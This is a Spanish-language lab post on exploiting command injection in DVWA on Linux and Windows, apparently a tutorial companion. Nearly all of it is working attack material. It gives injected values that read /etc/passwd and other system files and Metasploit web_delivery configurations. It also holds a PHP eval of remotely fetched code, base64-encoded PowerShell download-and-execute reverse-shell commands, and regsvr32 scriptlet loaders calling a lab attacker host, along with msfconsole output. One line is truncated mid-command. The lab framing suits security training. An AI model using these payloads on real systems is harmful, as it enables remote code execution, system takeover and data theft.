Laboratorio de Windows y Linux donde estan alojados los servidores web Vulnerables
COMANDOS USADOS
Código: Seleccionar todo
Ejemplo en Linux
sudo service mysql start
sudo service apache2 start
192.168.1.1;ls
192.168.1.1 | uname -a & users & id & w
192.168.1.1 | cat /etc/group
192.168.1.1 | pwd & whoami & ps
Bypass a Blacklist implemented “&”, “;”, ”&&”, “||”, “#”
High level
192.168.1.1 |cat /etc/passwd
192.168.1.1 |pwd
192.168.1.1 |whoami
192.168.1.1 |ps
192.168.1.1 |id
192.168.1.1 |users
192.168.1.1 |w
192.168.1.1 |uname -a
use exploit/multi/script/web_delivery
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 4444
exploit
127.0.0.1 &php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.130:8080/ltLFhcm3XaJzbz', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
127.0.0.1 |php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.130:8080/ltLFhcm3XaJzbz', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
Comandos de Windows
Arrancamos en low
1 192.168.1.1
2 192.168.1.100 && dir
3 192.168.1.100 && net user
Ejecutando powershell para acceder remotamente
1 use multi/script/web_delivery
set lhost 192.168.1.130
set lport 4444
2 La sintaxis de la URL para este exploit
set URIPATH powersploit
set target 2
4 set payload windows/powershell_reverse_tcp
5 exploit
6 Ver Sesiones y seleccionar session
sessions -i
sessions -i 1
Lowe Security
192.168.1.1 && powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABuAGoAZAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgBqAGQAdQBsAGwAKQB7ACQAbgBqAGQALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABuAGoAZAAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AH0AOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAzADAAOgA4ADAAOAAwAC8AcABvAHcAZQByAHMAcABsAG8AaQB0AC8ASgBaAEgAQgA4AG0AUwBnAHIAcAB2ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMwAwADoAOAAwADgAMAAvAHAAbwB3AGUAcgBzAHAAbABvAGkAdAAnACkAKQA7AA==
Medium
192.168.1.1 | powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB0ADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdAA3AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdAA3AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAxADMAMAA6ADgAMAA4ADAALwBwAG8AdwBlAHIAcwBwAGwAbwBpAHQALwB5AGQAOQBVAEUAbwBaAEoASAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAxADMAMAA6ADgAMAA4ADAALwBwAG8AdwBlAHIAcwBwAGwAbwBpAHQAJwApACkAOwA=
msf6 > use exploit/multi/script/web_deliveryCódigo: Seleccionar todo
Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 3
target => 3
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.1.130
lhost => 192.168.1.184
msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > exploitCódigo: Seleccionar todo
Low
192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.dll
Medium
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.dll
High
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.130:8080/8MFMA4Hgf.sct scrobj.dhttps://www.hackingarticles.in/comprehe ... injection/
https://www.hackingarticles.in/command- ... -security/
https://githubhot.com/repo/rapid7/metas ... sues/15618
https://www.hackers-arise.com/metasploi ... or-windows
https://www.hackingarticles.in/hack-rem ... ss-server/
VIDEO TUTORIAL
macropack,Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,como usar kali linux,comandos,commands,remote function,metasploit,laboratorio,lab,testing,web developers,desarrollador,vulnerabilities Pentesting synology xpenology Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell PMKID EAPOL Handshake backdoor LAN | Local Area Network CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Macro Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking PowerPoint Access Recuperar contraseña Advanced password recovery DCOM7 Hash cifrado descrifrar PSK instalacion install PowerShell php Mysql Install DVWA on Kali Linux Step-by-Step Damn Vulnerable Web Application Download o bajar database apache base de datos Cross-Site Request Forgery (CSRF) File Inclusion SQL injection Bruteforce attacks Vulnerabilidades CVE XAMPP Perl MariaDB SQL Injection Exploitation Explanation Examples Using DVWA What Is Command Injection? Que es command injection? Inyección de código (Code injection) Qué es Command Injection y cómo prevenirla Examples, Testing, Prevention Command injection attack command injection payloads
